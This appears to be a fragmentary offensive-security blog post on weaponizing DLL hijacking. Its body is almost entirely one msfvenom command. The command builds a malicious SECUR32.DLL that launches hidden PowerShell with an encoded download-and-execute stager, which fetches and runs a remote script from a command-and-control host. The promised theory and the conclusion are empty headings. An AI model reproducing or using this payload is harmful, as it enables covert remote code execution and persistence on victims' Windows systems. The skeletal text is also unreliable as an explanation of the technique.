Weaponizing DLL Hijacking with Custom PowerShell C2

I like to start with theory first, so let’s go.

The idea is simple

msfvenom -f dll -p windows/exec CMD="powershell.exe -exec bypass -nop -w hidden -e SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAOQAyAC4AMQA2ADgALgAxADIANgAuADEAMgA4AC8AYwBsAGkAZQBuAHQALgBwAHMAMQAnACkA" -o SECUR32.DLL

Conclusion
